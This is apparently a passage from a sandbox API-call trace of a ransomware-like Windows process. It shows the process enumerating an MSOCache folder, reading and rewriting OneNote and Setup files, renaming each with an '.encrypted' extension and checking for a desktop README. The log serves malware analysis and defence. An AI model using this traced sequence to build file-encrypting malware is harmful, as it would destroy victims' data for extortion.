lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0219.272] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0219.273] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f0b30 [0219.275] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0219.276] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0219.276] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0219.276] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0219.276] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0219.276] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0219.277] FindClose (in: hFindFile=0x94f0b30 | out: hFindFile=0x94f0b30) returned 1 [0219.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0219.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0219.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee838) returned 1 [0219.278] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0219.278] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2ee314, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0219.278] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2ee560 | out: lpFindFileData=0x2ee560*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x94f0b30 [0219.279] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0219.279] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0219.279] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0219.280] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0219.280] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0219.280] FindNextFileW (in: hFindFile=0x94f0b30, lpFindFileData=0x2ee570 | out: lpFindFileData=0x2ee570*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0219.280] FindClose (in: hFindFile=0x94f0b30 | out: hFindFile=0x94f0b30) returned 1 [0219.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7f8) returned 1 [0219.281] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee804) returned 1 [0219.281] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0219.281] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0219.281] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0219.282] GetFileType (hFile=0x280) returned 0x1 [0219.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0219.283] GetFileType (hFile=0x280) returned 0x1 [0219.283] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x646 [0219.283] ReadFile (in: hFile=0x280, lpBuffer=0x23f17f4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x23f17f4*, lpNumberOfBytesRead=0x2ee7d4*=0x646, lpOverlapped=0x0) returned 1 [0219.293] CloseHandle (hObject=0x280) returned 1 [0219.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0219.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0219.543] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0219.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0219.544] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0219.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0219.544] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0219.545] GetFileType (hFile=0x280) returned 0x1 [0219.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0219.545] GetFileType (hFile=0x280) returned 0x1 [0219.545] WriteFile (in: hFile=0x280, lpBuffer=0x2281528*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x2281528*, lpNumberOfBytesWritten=0x2ee798*=0x650, lpOverlapped=0x0) returned 1 [0219.547] CloseHandle (hObject=0x280) returned 1 [0219.547] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpFilePart=0x0) returned 0x4d [0219.547] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.encrypted", lpFilePart=0x0) returned 0x57 [0219.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0219.547] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x686aaa00, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x650)) returned 1 [0219.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0219.547] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.encrypted")) returned 1 [0219.548] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpFilePart=0x0) returned 0x4a [0219.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0219.549] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0219.609] GetFileType (hFile=0x280) returned 0x1 [0219.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0219.610] GetFileType (hFile=0x280) returned 0x1 [0219.610] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x10a5df8 [0222.487] ReadFile (in: hFile=0x280, lpBuffer=0x1f551018, nNumberOfBytesToRead=0x10a5df8, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x1f551018*, lpNumberOfBytesRead=0x2ee7d4*=0x10a5df8, lpOverlapped=0x0) returned 1 [0222.883] CloseHandle (hObject=0x280) returned 1 [0224.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0224.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0224.934] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0224.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0224.934] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpFilePart=0x0) returned 0x4a [0224.934] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0224.934] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0224.936] GetFileType (hFile=0x280) returned 0x1 [0224.936] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0224.936] GetFileType (hFile=0x280) returned 0x1 [0224.936] WriteFile (in: hFile=0x280, lpBuffer=0xe551018*, nNumberOfBytesToWrite=0x10a5e00, lpNumberOfBytesWritten=0x2ee7c4, lpOverlapped=0x0 | out: lpBuffer=0xe551018*, lpNumberOfBytesWritten=0x2ee7c4*=0x10a5e00, lpOverlapped=0x0) returned 1 [0225.420] CloseHandle (hObject=0x280) returned 1 [0225.420] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpFilePart=0x0) returned 0x4a [0225.420] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.encrypted", lpFilePart=0x0) returned 0x54 [0225.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0225.421] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x6be74da0, ftLastWriteTime.dwHighDateTime=0x1d5fc36, nFileSizeHigh=0x0, nFileSizeLow=0x10a5e00)) returned 1 [0225.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee7a8) returned 1 [0225.421] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.encrypted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.encrypted")) returned 1 [0225.422] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee22c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0225.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee720) returned 1 [0225.422] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0225.423] GetFileType (hFile=0x280) returned 0x1 [0225.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee71c) returned 1 [0225.423] GetFileType (hFile=0x280) returned 0x1 [0225.423] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x2ee828 | out: lpFileSizeHigh=0x2ee828*=0x0) returned 0x7c4 [0225.424] ReadFile (in: hFile=0x280, lpBuffer=0x224b6b4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ee7d4, lpOverlapped=0x0 | out: lpBuffer=0x224b6b4*, lpNumberOfBytesRead=0x2ee7d4*=0x7c4, lpOverlapped=0x0) returned 1 [0225.425] CloseHandle (hObject=0x280) returned 1 [0225.489] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", nBufferLength=0x105, lpBuffer=0x2ee340, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README", lpFilePart=0x0) returned 0x2c [0225.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7a0) returned 1 [0225.489] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme"), fInfoLevelId=0x0, lpFileInformation=0x2ee81c | out: lpFileInformation=0x2ee81c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0225.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee79c) returned 1 [0225.489] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee214, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0225.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee708) returned 1 [0225.489] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x280 [0225.490] GetFileType (hFile=0x280) returned 0x1 [0225.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2ee704) returned 1 [0225.491] GetFileType (hFile=0x280) returned 0x1 [0225.491] WriteFile (in: hFile=0x280, lpBuffer=0x229c608*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0x2ee798, lpOverlapped=0x0 | out: lpBuffer=0x229c608*, lpNumberOfBytesWritten=0x2ee798*=0x7d0, lpOverlapped=0x0) returned 1 [0225.492] CloseHandle (hObject=0x280) returned 1 [0225.492] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0225.492] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", nBufferLength=0x105, lpBuffer=0x2ee34c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.encrypted", lpFilePart=0x0) returned 0x52 [0225.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2ee7ac) returned 1 [0225.492] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2ee828 | out: lpFileInformation=0x2ee828*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, 